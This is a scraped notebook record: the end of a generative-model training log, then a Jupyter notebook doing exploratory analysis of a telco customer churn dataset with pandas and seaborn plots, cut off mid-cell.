iterations/epoch.\nIter 5883 | Time 42.4502(40.5741) | Bit/dim 1.0753(1.0738) | Xent 0.0000(0.0000) | Loss 1.0753(1.0738) | Error 0.0000(0.0000) Steps 452(449.57) | Grad Norm 0.1431(0.0994) | Total Time 10.00(10.00)\nIter 5884 | Time 42.2774(40.6252) | Bit/dim 1.0726(1.0738) | Xent 0.0000(0.0000) | Loss 1.0726(1.0738) | Error 0.0000(0.0000) Steps 446(449.46) | Grad Norm 0.0906(0.0992) | Total Time 10.00(10.00)\nIter 5885 | Time 38.9984(40.5764) | Bit/dim 1.0746(1.0738) | Xent 0.0000(0.0000) | Loss 1.0746(1.0738) | Error 0.0000(0.0000) Steps 452(449.53) | Grad Norm 0.0543(0.0978) | Total Time 10.00(10.00)\nIter 5886 | Time 41.9293(40.6170) | Bit/dim 1.0756(1.0739) | Xent 0.0000(0.0000) | Loss 1.0756(1.0739) | Error 0.0000(0.0000) Steps 446(449.43) | Grad Norm 0.0985(0.0978) | Total Time 10.00(10.00)\nIter 5887 | Time 40.3872(40.6101) | Bit/dim 1.0723(1.0738) | Xent 0.0000(0.0000) | Loss 1.0723(1.0738) | Error 0.0000(0.0000) Steps 452(449.51) | Grad Norm 0.1114(0.0982) | Total Time 10.00(10.00)\nIter 5888 | Time 40.9802(40.6212) | Bit/dim 1.0726(1.0738) | Xent 0.0000(0.0000) | Loss 1.0726(1.0738) | Error 0.0000(0.0000) Steps 452(449.58) | Grad Norm 0.0584(0.0971) | Total Time 10.00(10.00)\nIter 5889 | Time 40.6562(40.6222) | Bit/dim 1.0715(1.0737) | Xent 0.0000(0.0000) | Loss 1.0715(1.0737) | Error 0.0000(0.0000) Steps 446(449.47) | Grad Norm 0.1452(0.0985) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0559 | Time 15.1436, Epoch Time 315.4256(311.9231), Bit/dim 1.0689(best: 1.0682), Xent 0.0000, Loss 1.0689, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5890 | Time 41.5341(40.6496) | Bit/dim 1.0761(1.0738) | Xent 0.0000(0.0000) | Loss 1.0761(1.0738) | Error 0.0000(0.0000) Steps 452(449.55) | Grad Norm 0.0864(0.0981) | Total Time 10.00(10.00)\nIter 5891 | Time 40.7620(40.6529) | Bit/dim 1.0740(1.0738) | Xent 0.0000(0.0000) | Loss 1.0740(1.0738) | Error 0.0000(0.0000) Steps 452(449.62) | Grad Norm 0.0810(0.0976) | Total Time 10.00(10.00)\nIter 5892 | Time 41.8370(40.6885) | Bit/dim 1.0696(1.0737) | Xent 0.0000(0.0000) | Loss 1.0696(1.0737) | Error 0.0000(0.0000) Steps 446(449.51) | Grad Norm 0.1264(0.0985) | Total Time 10.00(10.00)\nIter 5893 | Time 41.4235(40.7105) | Bit/dim 1.0722(1.0736) | Xent 0.0000(0.0000) | Loss 1.0722(1.0736) | Error 0.0000(0.0000) Steps 452(449.59) | Grad Norm 0.1058(0.0987) | Total Time 10.00(10.00)\nIter 5894 | Time 41.2708(40.7273) | Bit/dim 1.0740(1.0736) | Xent 0.0000(0.0000) | Loss 1.0740(1.0736) | Error 0.0000(0.0000) Steps 452(449.66) | Grad Norm 0.0866(0.0983) | Total Time 10.00(10.00)\nIter 5895 | Time 39.5381(40.6917) | Bit/dim 1.0718(1.0736) | Xent 0.0000(0.0000) | Loss 1.0718(1.0736) | Error 0.0000(0.0000) Steps 452(449.73) | Grad Norm 0.1232(0.0991) | Total Time 10.00(10.00)\nIter 5896 | Time 41.7116(40.7222) | Bit/dim 1.0757(1.0736) | Xent 0.0000(0.0000) | Loss 1.0757(1.0736) | Error 0.0000(0.0000) Steps 446(449.62) | Grad Norm 0.0845(0.0987) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0560 | Time 15.1990, Epoch Time 315.4880(312.0301), Bit/dim 1.0682(best: 1.0682), Xent 0.0000, Loss 1.0682, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5897 | Time 39.4517(40.6841) | Bit/dim 1.0735(1.0736) | Xent 0.0000(0.0000) | Loss 1.0735(1.0736) | Error 0.0000(0.0000) Steps 446(449.51) | Grad Norm 0.0624(0.0976) | Total Time 10.00(10.00)\nIter 5898 | Time 40.2278(40.6704) | Bit/dim 1.0686(1.0735) | Xent 0.0000(0.0000) | Loss 1.0686(1.0735) | Error 0.0000(0.0000) Steps 446(449.41) | Grad Norm 0.0915(0.0974) | Total Time 10.00(10.00)\nIter 5899 | Time 40.8311(40.6753) | Bit/dim 1.0770(1.0736) | Xent 0.0000(0.0000) | Loss 1.0770(1.0736) | Error 0.0000(0.0000) Steps 452(449.48) | Grad Norm 0.0738(0.0967) | Total Time 10.00(10.00)\nIter 5900 | Time 40.4432(40.6683) | Bit/dim 1.0731(1.0736) | Xent 0.0000(0.0000) | Loss 1.0731(1.0736) | Error 0.0000(0.0000) Steps 452(449.56) | Grad Norm 0.0889(0.0964) | Total Time 10.00(10.00)\nIter 5901 | Time 40.2955(40.6571) | Bit/dim 1.0778(1.0737) | Xent 0.0000(0.0000) | Loss 1.0778(1.0737) | Error 0.0000(0.0000) Steps 446(449.45) | Grad Norm 0.0949(0.0964) | Total Time 10.00(10.00)\nIter 5902 | Time 39.4594(40.6212) | Bit/dim 1.0722(1.0737) | Xent 0.0000(0.0000) | Loss 1.0722(1.0737) | Error 0.0000(0.0000) Steps 446(449.35) | Grad Norm 0.0975(0.0964) | Total Time 10.00(10.00)\nIter 5903 | Time 39.4167(40.5851) | Bit/dim 1.0763(1.0737) | Xent 0.0000(0.0000) | Loss 1.0763(1.0737) | Error 0.0000(0.0000) Steps 446(449.25) | Grad Norm 0.1639(0.0984) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0561 | Time 14.9828, Epoch Time 307.5856(311.8967), Bit/dim 1.0687(best: 1.0682), Xent 0.0000, Loss 1.0687, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5904 | Time 40.7214(40.5891) | Bit/dim 1.0786(1.0739) | Xent 0.0000(0.0000) | Loss 1.0786(1.0739) | Error 0.0000(0.0000) Steps 452(449.33) | Grad Norm 0.0783(0.0978) | Total Time 10.00(10.00)\nIter 5905 | Time 42.3505(40.6420) | Bit/dim 1.0735(1.0739) | Xent 0.0000(0.0000) | Loss 1.0735(1.0739) | Error 0.0000(0.0000) Steps 458(449.59) | Grad Norm 0.1585(0.0997) | Total Time 10.00(10.00)\nIter 5906 | Time 41.4638(40.6666) | Bit/dim 1.0727(1.0738) | Xent 0.0000(0.0000) | Loss 1.0727(1.0738) | Error 0.0000(0.0000) Steps 446(449.48) | Grad Norm 0.1039(0.0998) | Total Time 10.00(10.00)\nIter 5907 | Time 41.5614(40.6935) | Bit/dim 1.0734(1.0738) | Xent 0.0000(0.0000) | Loss 1.0734(1.0738) | Error 0.0000(0.0000) Steps 446(449.38) | Grad Norm 0.0620(0.0987) | Total Time 10.00(10.00)\nIter 5908 | Time 40.8549(40.6983) | Bit/dim 1.0743(1.0738) | Xent 0.0000(0.0000) | Loss 1.0743(1.0738) | Error 0.0000(0.0000) Steps 452(449.46) | Grad Norm 0.0933(0.0985) | Total Time 10.00(10.00)\nIter 5909 | Time 40.4625(40.6912) | Bit/dim 1.0715(1.0738) | Xent 0.0000(0.0000) | Loss 1.0715(1.0738) | Error 0.0000(0.0000) Steps 446(449.35) | Grad Norm 0.1315(0.0995) | Total Time 10.00(10.00)\nIter 5910 | Time 41.7588(40.7233) | Bit/dim 1.0732(1.0737) | Xent 0.0000(0.0000) | Loss 1.0732(1.0737) | Error 0.0000(0.0000) Steps 446(449.25) | Grad Norm 0.0736(0.0987) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0562 | Time 15.1465, Epoch Time 316.5936(312.0376), Bit/dim 1.0686(best: 1.0682), Xent 0.0000, Loss 1.0686, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5911 | Time 39.7946(40.6954) | Bit/dim 1.0768(1.0738) | Xent 0.0000(0.0000) | Loss 1.0768(1.0738) | Error 0.0000(0.0000) Steps 446(449.15) | Grad Norm 0.0704(0.0979) | Total Time 10.00(10.00)\nIter 5912 | Time 42.2856(40.7431) | Bit/dim 1.0700(1.0737) | Xent 0.0000(0.0000) | Loss 1.0700(1.0737) | Error 0.0000(0.0000) Steps 452(449.24) | Grad Norm 0.0857(0.0975) | Total Time 10.00(10.00)\nIter 5913 | Time 40.9905(40.7505) | Bit/dim 1.0729(1.0737) | Xent 0.0000(0.0000) | Loss 1.0729(1.0737) | Error 0.0000(0.0000) Steps 452(449.32) | Grad Norm 0.0766(0.0969) | Total Time 10.00(10.00)\nIter 5914 | Time 41.9287(40.7859) | Bit/dim 1.0752(1.0737) | Xent 0.0000(0.0000) | Loss 1.0752(1.0737) | Error 0.0000(0.0000) Steps 446(449.22) | Grad Norm 0.0992(0.0969) | Total Time 10.00(10.00)\nIter 5915 | Time 40.1774(40.7676) | Bit/dim 1.0723(1.0737) | Xent 0.0000(0.0000) | Loss 1.0723(1.0737) | Error 0.0000(0.0000) Steps 446(449.13) | Grad Norm 0.0593(0.0958) | Total Time 10.00(10.00)\nIter 5916 | Time 41.6670(40.7946) | Bit/dim 1.0749(1.0737) | Xent 0.0000(0.0000) | Loss 1.0749(1.0737) | Error 0.0000(0.0000) Steps 452(449.21) | Grad Norm 0.0691(0.0950) | Total Time 10.00(10.00)\nIter 5917 | Time 41.3025(40.8098) | Bit/dim 1.0728(1.0737) | Xent 0.0000(0.0000) | Loss 1.0728(1.0737) | Error 0.0000(0.0000) Steps 452(449.30) | Grad Norm 0.0725(0.0943) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0563 | Time 15.1350, Epoch Time 315.6752(312.1468), Bit/dim 1.0680(best: 1.0682), Xent 0.0000, Loss 1.0680, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5918 | Time 41.0342(40.8166) | Bit/dim 1.0712(1.0736) | Xent 0.0000(0.0000) | Loss 1.0712(1.0736) | Error 0.0000(0.0000) Steps 446(449.20) | Grad Norm 0.0882(0.0941) | Total Time 10.00(10.00)\nIter 5919 | Time 38.8303(40.7570) | Bit/dim 1.0745(1.0737) | Xent 0.0000(0.0000) | Loss 1.0745(1.0737) | Error 0.0000(0.0000) Steps 452(449.28) | Grad Norm 0.0721(0.0935) | Total Time 10.00(10.00)\nIter 5920 | Time 40.7634(40.7572) | Bit/dim 1.0762(1.0737) | Xent 0.0000(0.0000) | Loss 1.0762(1.0737) | Error 0.0000(0.0000) Steps 452(449.36) | Grad Norm 0.0628(0.0926) | Total Time 10.00(10.00)\nIter 5921 | Time 41.4122(40.7768) | Bit/dim 1.0742(1.0738) | Xent 0.0000(0.0000) | Loss 1.0742(1.0738) | Error 0.0000(0.0000) Steps 446(449.26) | Grad Norm 0.0683(0.0918) | Total Time 10.00(10.00)\nIter 5922 | Time 42.0929(40.8163) | Bit/dim 1.0765(1.0738) | Xent 0.0000(0.0000) | Loss 1.0765(1.0738) | Error 0.0000(0.0000) Steps 446(449.16) | Grad Norm 0.0689(0.0911) | Total Time 10.00(10.00)\nIter 5923 | Time 40.7724(40.8150) | Bit/dim 1.0710(1.0737) | Xent 0.0000(0.0000) | Loss 1.0710(1.0737) | Error 0.0000(0.0000) Steps 452(449.25) | Grad Norm 0.1045(0.0915) | Total Time 10.00(10.00)\nIter 5924 | Time 40.5425(40.8068) | Bit/dim 1.0695(1.0736) | Xent 0.0000(0.0000) | Loss 1.0695(1.0736) | Error 0.0000(0.0000) Steps 452(449.33) | Grad Norm 0.0553(0.0905) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0564 | Time 15.3287, Epoch Time 313.4728(312.1866), Bit/dim 1.0685(best: 1.0680), Xent 0.0000, Loss 1.0685, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5925 | Time 42.0276(40.8434) | Bit/dim 1.0728(1.0736) | Xent 0.0000(0.0000) | Loss 1.0728(1.0736) | Error 0.0000(0.0000) Steps 452(449.41) | Grad Norm 0.0692(0.0898) | Total Time 10.00(10.00)\nIter 5926 | Time 39.8936(40.8149) | Bit/dim 1.0743(1.0736) | Xent 0.0000(0.0000) | Loss 1.0743(1.0736) | Error 0.0000(0.0000) Steps 446(449.31) | Grad Norm 0.0606(0.0889) | Total Time 10.00(10.00)\nIter 5927 | Time 39.7957(40.7844) | Bit/dim 1.0693(1.0735) | Xent 0.0000(0.0000) | Loss 1.0693(1.0735) | Error 0.0000(0.0000) Steps 452(449.39) | Grad Norm 0.0612(0.0881) | Total Time 10.00(10.00)\nIter 5928 | Time 39.6817(40.7513) | Bit/dim 1.0712(1.0734) | Xent 0.0000(0.0000) | Loss 1.0712(1.0734) | Error 0.0000(0.0000) Steps 446(449.29) | Grad Norm 0.0740(0.0877) | Total Time 10.00(10.00)\nIter 5929 | Time 40.4155(40.7412) | Bit/dim 1.0749(1.0735) | Xent 0.0000(0.0000) | Loss 1.0749(1.0735) | Error 0.0000(0.0000) Steps 452(449.37) | Grad Norm 0.0705(0.0872) | Total Time 10.00(10.00)\nIter 5930 | Time 40.2516(40.7265) | Bit/dim 1.0727(1.0734) | Xent 0.0000(0.0000) | Loss 1.0727(1.0734) | Error 0.0000(0.0000) Steps 446(449.27) | Grad Norm 0.1182(0.0881) | Total Time 10.00(10.00)\nIter 5931 | Time 40.6775(40.7251) | Bit/dim 1.0750(1.0735) | Xent 0.0000(0.0000) | Loss 1.0750(1.0735) | Error 0.0000(0.0000) Steps 452(449.35) | Grad Norm 0.0648(0.0874) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0565 | Time 15.1303, Epoch Time 310.5796(312.1383), Bit/dim 1.0686(best: 1.0680), Xent 0.0000, Loss 1.0686, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5932 | Time 40.4630(40.7172) | Bit/dim 1.0808(1.0737) | Xent 0.0000(0.0000) | Loss 1.0808(1.0737) | Error 0.0000(0.0000) Steps 452(449.43) | Grad Norm 0.0686(0.0868) | Total Time 10.00(10.00)\nIter 5933 | Time 40.3167(40.7052) | Bit/dim 1.0705(1.0736) | Xent 0.0000(0.0000) | Loss 1.0705(1.0736) | Error 0.0000(0.0000) Steps 446(449.33) | Grad Norm 0.1137(0.0876) | Total Time 10.00(10.00)\nIter 5934 | Time 41.6319(40.7330) | Bit/dim 1.0710(1.0735) | Xent 0.0000(0.0000) | Loss 1.0710(1.0735) | Error 0.0000(0.0000) Steps 446(449.23) | Grad Norm 0.0989(0.0880) | Total Time 10.00(10.00)\nIter 5935 | Time 39.1746(40.6862) | Bit/dim 1.0778(1.0737) | Xent 0.0000(0.0000) | Loss 1.0778(1.0737) | Error 0.0000(0.0000) Steps 452(449.31) | Grad Norm 0.0793(0.0877) | Total Time 10.00(10.00)\nIter 5936 | Time 39.1640(40.6406) | Bit/dim 1.0708(1.0736) | Xent 0.0000(0.0000) | Loss 1.0708(1.0736) | Error 0.0000(0.0000) Steps 446(449.21) | Grad Norm 0.1125(0.0885) | Total Time 10.00(10.00)\nIter 5937 | Time 39.5697(40.6084) | Bit/dim 1.0697(1.0735) | Xent 0.0000(0.0000) | Loss 1.0697(1.0735) | Error 0.0000(0.0000) Steps 452(449.30) | Grad Norm 0.1297(0.0897) | Total Time 10.00(10.00)\nIter 5938 | Time 41.2909(40.6289) | Bit/dim 1.0724(1.0734) | Xent 0.0000(0.0000) | Loss 1.0724(1.0734) | Error 0.0000(0.0000) Steps 452(449.38) | Grad Norm 0.0648(0.0890) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0566 | Time 14.9903, Epoch Time 309.1509(312.0487), Bit/dim 1.0692(best: 1.0680), Xent 0.0000, Loss 1.0692, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5939 | Time 40.5493(40.6265) | Bit/dim 1.0736(1.0734) | Xent 0.0000(0.0000) | Loss 1.0736(1.0734) | Error 0.0000(0.0000) Steps 446(449.27) | Grad Norm 0.0975(0.0892) | Total Time 10.00(10.00)\n"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code"
]
] |
e70724a0e28e2899d193468484c86cc506c5172e | 947,800 | ipynb | Jupyter Notebook | 1_EDA.ipynb | andrewng88/telco_churn | f0fbdf6b05dd970b21a9524c231c40f70b0f1925 | [
"CNRI-Python",
"Linux-OpenIB",
"IBM-pibs"
] | 2 | 2020-09-27T09:52:32.000Z | 2021-05-11T22:57:08.000Z | 1_EDA.ipynb | andrewng88/telco_churn | f0fbdf6b05dd970b21a9524c231c40f70b0f1925 | [
"CNRI-Python",
"Linux-OpenIB",
"IBM-pibs"
] | null | null | null | 1_EDA.ipynb | andrewng88/telco_churn | f0fbdf6b05dd970b21a9524c231c40f70b0f1925 | [
"CNRI-Python",
"Linux-OpenIB",
"IBM-pibs"
] | null | null | null | 291.36182 | 360,376 | 0.902236 | [
[
[
"import pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n# suppress warning\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n# set diverging color palette\n# https://chrisalbon.com/python/data_visualization/seaborn_color_palettes/\ncolor = sns.color_palette('CMRmap')\nsns.palplot(color)\nsns.set()",
"_____no_output_____"
]
],
[
[
"**Problem Statement**\n\nImprove sales revenue of the telco by predicting(classifiying) customer Churn/No Churn using the provided features.\nAccuracy must be the same or better than baseline but we 'gotta-catch'em all' the Churn customers. ",
"_____no_output_____"
]
],
[
[
"# read csv and display 5 rows\ndf = pd.read_csv('data/churn.csv')\ndf.head()\n\n# drop 'customerID' as it's a serialize number\ndf.drop(columns = 'customerID',inplace=True)",
"_____no_output_____"
],
[
"# Churn is our target variables, the rest are predictor variables\ndf.columns",
"_____no_output_____"
],
[
"# Convert to numeric\ndf['TotalCharges'] = pd.to_numeric(df['TotalCharges'],errors=\"coerce\")\ndf.isnull().sum().sort_values(ascending=False)",
"_____no_output_____"
],
[
"#display all rows that are null\ndf[df.isna().any(axis=1)]",
"_____no_output_____"
],
[
"# We will drop the 11 values since it's only 0.15% of the DF\n# and we are not able to determine the Total Charges\n# and the target variable is 'No Churn'\ndf.dropna(inplace=True)",
"_____no_output_____"
],
[
"# verify there is no null\ndf.isnull().sum().sort_values(ascending=False)",
"_____no_output_____"
],
[
"# backup processed df\ndf.to_csv('data/churn_done.csv',index=False)",
"_____no_output_____"
],
[
"df.head()",
"_____no_output_____"
],
[
"g= sns.catplot(x=\"Churn\", kind=\"count\", data=df)\ng.fig.suptitle('Valuecount of Churn and No Churn');",
"_____no_output_____"
],
[
"# 27% of the customers churn\n# there is a chance that we may need to consider this an imbalanced dataset\n# The baseline accuracy is 73%\ndf.Churn.value_counts(normalize=True).round(2)",
"_____no_output_____"
],
[
"df.info()",
"<class 'pandas.core.frame.DataFrame'>\nInt64Index: 7032 entries, 0 to 7042\nData columns (total 20 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 gender 7032 non-null object \n 1 SeniorCitizen 7032 non-null int64 \n 2 Partner 7032 non-null object \n 3 Dependents 7032 non-null object \n 4 tenure 7032 non-null int64 \n 5 PhoneService 7032 non-null object \n 6 MultipleLines 7032 non-null object \n 7 InternetService 7032 non-null object \n 8 OnlineSecurity 7032 non-null object \n 9 OnlineBackup 7032 non-null object \n 10 DeviceProtection 7032 non-null object \n 11 TechSupport 7032 non-null object \n 12 StreamingTV 7032 non-null object \n 13 StreamingMovies 7032 non-null object \n 14 Contract 7032 non-null object \n 15 PaperlessBilling 7032 non-null object \n 16 PaymentMethod 7032 non-null object \n 17 MonthlyCharges 7032 non-null float64\n 18 TotalCharges 7032 non-null float64\n 19 Churn 7032 non-null object \ndtypes: float64(2), int64(2), object(16)\nmemory usage: 1.4+ MB\n"
],
[
"# 7032 rows with 19 features ( less target variable)\ndf.shape",
"_____no_output_____"
],
[
"# display all the unique values\nprint('col name \\t dtype \\t Unique Values')\nprint('=======================================')\nfor col in df.columns:\n print(f'{col} \\t | { df[col].dtype} -> { df[col].unique()} \\n')",
"col name \t dtype \t Unique Values\n=======================================\ngender \t | object -> ['Female' 'Male'] \n\nSeniorCitizen \t | int64 -> [0 1] \n\nPartner \t | object -> ['Yes' 'No'] \n\nDependents \t | object -> ['No' 'Yes'] \n\ntenure \t | int64 -> [ 1 34 2 45 8 22 10 28 62 13 16 58 49 25 69 52 71 21 12 30 47 72 17 27\n 5 46 11 70 63 43 15 60 18 66 9 3 31 50 64 56 7 42 35 48 29 65 38 68\n 32 55 37 36 41 6 4 33 67 23 57 61 14 20 53 40 59 24 44 19 54 51 26 39] \n\nPhoneService \t | object -> ['No' 'Yes'] \n\nMultipleLines \t | object -> ['No phone service' 'No' 'Yes'] \n\nInternetService \t | object -> ['DSL' 'Fiber optic' 'No'] \n\nOnlineSecurity \t | object -> ['No' 'Yes' 'No internet service'] \n\nOnlineBackup \t | object -> ['Yes' 'No' 'No internet service'] \n\nDeviceProtection \t | object -> ['No' 'Yes' 'No internet service'] \n\nTechSupport \t | object -> ['No' 'Yes' 'No internet service'] \n\nStreamingTV \t | object -> ['No' 'Yes' 'No internet service'] \n\nStreamingMovies \t | object -> ['No' 'Yes' 'No internet service'] \n\nContract \t | object -> ['Month-to-month' 'One year' 'Two year'] \n\nPaperlessBilling \t | object -> ['Yes' 'No'] \n\nPaymentMethod \t | object -> ['Electronic check' 'Mailed check' 'Bank transfer (automatic)'\n 'Credit card (automatic)'] \n\nMonthlyCharges \t | float64 -> [29.85 56.95 53.85 ... 63.1 44.2 78.7 ] \n\nTotalCharges \t | float64 -> [ 29.85 1889.5 108.15 ... 346.45 306.6 6844.5 ] \n\nChurn \t | object -> ['No' 'Yes'] \n\n"
]
],
[
[
"| # | Column | Old D-type | New D-type | Change ? |\n|----|------------------|------------|------------|----------|\n| 0 | gender | object | int64 | No |\n| 1 | SeniorCitizen | int64 | int64 | No |\n| 2 | Partner | object | int64 | Yes |\n| 3 | Dependents | object | int64 | Yes |\n| 4 | tenure | int64 | int64 | No |\n| 5 | PhoneService | object | int64 | Yes |\n| 6 | MultipleLines | object | object | No |\n| 7 | InternetService | object | object | No |\n| 8 | OnlineSecurity | object | object | No |\n| 9 | OnlineBackup | object | object | No |\n| 10 | DeviceProtection | object | object | No |\n| 11 | TechSupport | object | object | No |\n| 12 | StreamingTV | object | object | No |\n| 13 | StreamingMovies | object | object | No |\n| 14 | Contract | object | object | No |\n| 15 | PaperlessBilling | object | int64 | Yes |\n| 16 | PaymentMethod | object | object | No |\n| 17 | MonthlyCharges | float64 | float64 | No |\n| 18 | TotalCharges | object | float64 | Yes |\n| 19 | Churn | object | int64 | Yes |",
"_____no_output_____"
],
[
"There are 3 types of data:\n* Numerical - continuous values - 10.1cm , 5.2 seconds etc \n* Categorical ( Nominal - there is no order i.e blue, green , orange)\n* Categorical ( Ordinal - there is order i.e small, medium , large ) ",
"_____no_output_____"
]
],
[
[
"binary_columns = ['Partner','Dependents','PhoneService','PaperlessBilling','Churn']",
"_____no_output_____"
],
[
"from sklearn.preprocessing import LabelEncoder\n\nlabel = LabelEncoder()\n#label.fit(df['Partner'])\n\ndef convert_to_binary(binary_columns):\n '''convert a list of columns to binary'''\n for col in binary_columns:\n #df[col]= label.transform(df[col])\n df[col]= label.fit_transform(df[col])\n \nconvert_to_binary(binary_columns)",
"_____no_output_____"
],
[
"# ['Partner','Dependents','PhoneService','PaperlessBilling','Churn'] already binarized\ndf.info()",
"<class 'pandas.core.frame.DataFrame'>\nInt64Index: 7032 entries, 0 to 7042\nData columns (total 20 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 gender 7032 non-null object \n 1 SeniorCitizen 7032 non-null int64 \n 2 Partner 7032 non-null int32 \n 3 Dependents 7032 non-null int32 \n 4 tenure 7032 non-null int64 \n 5 PhoneService 7032 non-null int32 \n 6 MultipleLines 7032 non-null object \n 7 InternetService 7032 non-null object \n 8 OnlineSecurity 7032 non-null object \n 9 OnlineBackup 7032 non-null object \n 10 DeviceProtection 7032 non-null object \n 11 TechSupport 7032 non-null object \n 12 StreamingTV 7032 non-null object \n 13 StreamingMovies 7032 non-null object \n 14 Contract 7032 non-null object \n 15 PaperlessBilling 7032 non-null int32 \n 16 PaymentMethod 7032 non-null object \n 17 MonthlyCharges 7032 non-null float64\n 18 TotalCharges 7032 non-null float64\n 19 Churn 7032 non-null int32 \ndtypes: float64(2), int32(5), int64(2), object(11)\nmemory usage: 1.3+ MB\n"
]
],
[
[
"# Numerical features",
"_____no_output_____"
]
],
[
[
"# Plot all numerical fields using \"Churn\" as hue\ng = sns.pairplot(df, hue=\"Churn\",vars=['MonthlyCharges','TotalCharges','tenure'],aspect=1.5);",
"_____no_output_____"
]
],
[
[
"General feel\n\n* Most churn occurs when the customers are new ( low tenure ), higher Total Charges (~ `$`820) and higher Monthly Charges (~ `$`120)\n \n* Note : Orange is Churn",
"_____no_output_____"
],
[
"# Categorical features",
"_____no_output_____"
],
[
"This dataset has 16 categorical features:\n\n* Five binary features (Yes/No)\n* Nine features with three unique values \n* One feature with four unique values",
"_____no_output_____"
],
[
"## Age(SeniorCitizen) and Gender",
"_____no_output_____"
]
],
[
[
"g = sns.catplot(x=\"gender\", hue='Churn',kind=\"count\", data=df)\ng.fig.suptitle('Churn based on Gender');",
"_____no_output_____"
],
[
"df.groupby(['SeniorCitizen'])['Churn'].value_counts(normalize=True).round(2)",
"_____no_output_____"
],
[
"df.groupby(['SeniorCitizen'])['Churn'].value_counts()",
"_____no_output_____"
],
[
"df['SeniorCitizen'].value_counts()",
"_____no_output_____"
],
[
"sns.catplot(x=\"SeniorCitizen\", hue='Churn',kind=\"count\", data=df)\ng.fig.suptitle('Churn based on Age - SeniorCitizen');",
"_____no_output_____"
]
],
[
[
"Senior Citizen churn % rate ( 42% vs 24% ) . \n<br>Meaning almost 50% chance that a Senior Citizen Subsciber will churn eventhough the total count subscriber ratio is significantly lesser - 1 Senior vs 6 Non Senior",
"_____no_output_____"
],
[
"* Not much effect between gender\n* Most churn occurs around `$`30, `$`50 and `$`70",
"_____no_output_____"
],
[
"## Partner and Dependents",
"_____no_output_____"
]
],
[
[
"pd.concat([\n df.groupby(['Partner'])['Churn'].value_counts().round().to_frame(),\n df.groupby(['Partner'])['Churn'].value_counts(normalize=True).round(2).to_frame(name='%'), \n ],\n axis=1)",
"_____no_output_____"
],
[
"g = sns.catplot(x=\"Partner\", hue='Churn',kind=\"count\", data=df)\ng.fig.suptitle('Churn based on hasPartner');",
"_____no_output_____"
]
],
[
[
"If there is no Partner, the tendency to Churn is higher. Dual income has lesser chance to churn",
"_____no_output_____"
]
],
[
[
"pd.concat([\n df.groupby(['Dependents'])['Churn'].value_counts().round().to_frame(),\n df.groupby(['Dependents'])['Churn'].value_counts(normalize=True).round(2).to_frame(name='%'), \n ],\n axis=1)",
"_____no_output_____"
],
[
"g = sns.catplot(x=\"Dependents\", hue='Churn',kind=\"count\", data=df)\ng.fig.suptitle('Churn based on hasDependents');",
"_____no_output_____"
]
],
[
[
"If there is no Dependents, the tendency to Churn is higher. It could be adults that has Dependents are more responsible.",
"_____no_output_____"
],
[
"## Multiple lines",
"_____no_output_____"
]
],
[
[
"pd.concat([\n df.groupby(['MultipleLines'])['Churn'].value_counts().round().to_frame(),\n df.groupby(['MultipleLines'])['Churn'].value_counts(normalize=True).round(2).to_frame(name='%'), \n ],\n axis=1)",
"_____no_output_____"
],
[
"g = sns.catplot(x=\"MultipleLines\", hue='Churn',kind=\"count\",data=df)\ng.fig.suptitle('Churn based on MultipleLines');",
"_____no_output_____"
]
],
[
[
"Multiple Lines doesn't seem to be a factor that contributes signifantly to the churn rate as all the 3 percentage are similar at around 25% and 'with MultiplineLines' registered the highest with 29%",
"_____no_output_____"
]
],
[
[
"g = sns.catplot(data=df,x=\"MultipleLines\", y=\"MonthlyCharges\", hue=\"Churn\", kind=\"violin\",split=True)\ng.fig.suptitle('Violin plot distributin of MonthlyCharges for Multiplelines');",
"_____no_output_____"
]
],
[
[
"Between the MultipleLines , the most occurence for each of the category are \n* 'No phone service' ~`$`25\n* 'No MultipleLines' ~`$`75\n* 'With MultipleLines' ~`$`100",
"_____no_output_____"
],
[
"## Phone Services",
"_____no_output_____"
]
],
[
[
"pd.concat([\n df.groupby(['PhoneService'])['Churn'].value_counts().round().to_frame(),\n df.groupby(['PhoneService'])['Churn'].value_counts(normalize=True).round(2).to_frame(name='%'), \n ],\n axis=1)",
"_____no_output_____"
],
[
"g = sns.catplot(x=\"PhoneService\", hue='Churn',kind=\"count\", data=df)\nplt.subplots_adjust(top=0.9)\ng.fig.suptitle('Churn based on PhoneService');",
"_____no_output_____"
]
],
[
[
"Phone Lines doesn't seem to be a factor that contributes signifantly to the churn rate as it's similar to MultipleLines at around 25%",
"_____no_output_____"
]
],
[
[
"g = sns.catplot(data=df,x=\"PhoneService\", y=\"MonthlyCharges\", hue=\"Churn\", kind=\"violin\",split=True)\nplt.subplots_adjust(top=0.9)\ng = g.fig.suptitle('Violin plot distribution of MonthlyCharges for PhoneService');",
"_____no_output_____"
]
],
[
[
"Most occurence of Churn occurs ~$70",
"_____no_output_____"
],
[
"## InternetService",
"_____no_output_____"
]
],
[
[
"pd.concat([\n df.groupby(['InternetService'])['Churn'].value_counts().round().to_frame(),\n df.groupby(['InternetService'])['Churn'].value_counts(normalize=True).round(2).to_frame(name='%'), \n ],\n axis=1)",
"_____no_output_____"
]
],
[
[
"If one has Fiber optic, the churn rate is high at around 42%.",
"_____no_output_____"
]
],
[
[
